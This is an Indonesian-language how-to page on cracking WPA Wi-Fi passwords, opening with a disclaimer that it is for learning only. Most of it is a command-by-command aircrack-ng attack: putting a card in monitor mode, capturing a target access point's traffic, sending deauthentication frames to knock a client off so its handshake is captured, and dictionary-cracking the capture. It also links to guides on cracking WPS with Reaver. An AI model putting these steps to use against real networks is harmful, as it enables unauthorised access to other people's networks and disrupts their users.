Teknik Menjebol WPA
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya.
Cara Manjur
- http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
- http://blog.metasplo.it/2012/01/exploiting-wpa2-wps-vulnerabilities.html
- http://redmine.backtrack-linux.org:8080/issues/316
Cara Lama
- Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan di shell
export AP=00:30:4F:4E:2B:50 export WIFI=00:11:6b:33:d3:90 export CHANNEL=1
Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
airmon-ng start wlan0 1
Biasanya akan tampil kira-kira sebagai berikut
Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
Untuk mempercepat proses gunakan aireplay-ng
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
Dimana
-a MAC AP -c MAC client
Kunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke
- http://www.aircrack-ng.org/doku.php?id=faq
- http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
- http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.
Jalankan aircrack untuk mengcrack WPA
# aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap
-b MAC BSSID
Versi yang lebih panjang
# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w kamuspass.txt # aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt # aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txt
Bisa juga menggunakan perintah
# aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txt
Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA
Referensi
- http://www.aircrack-ng.org/doku.php?id=faq
- http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
- http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists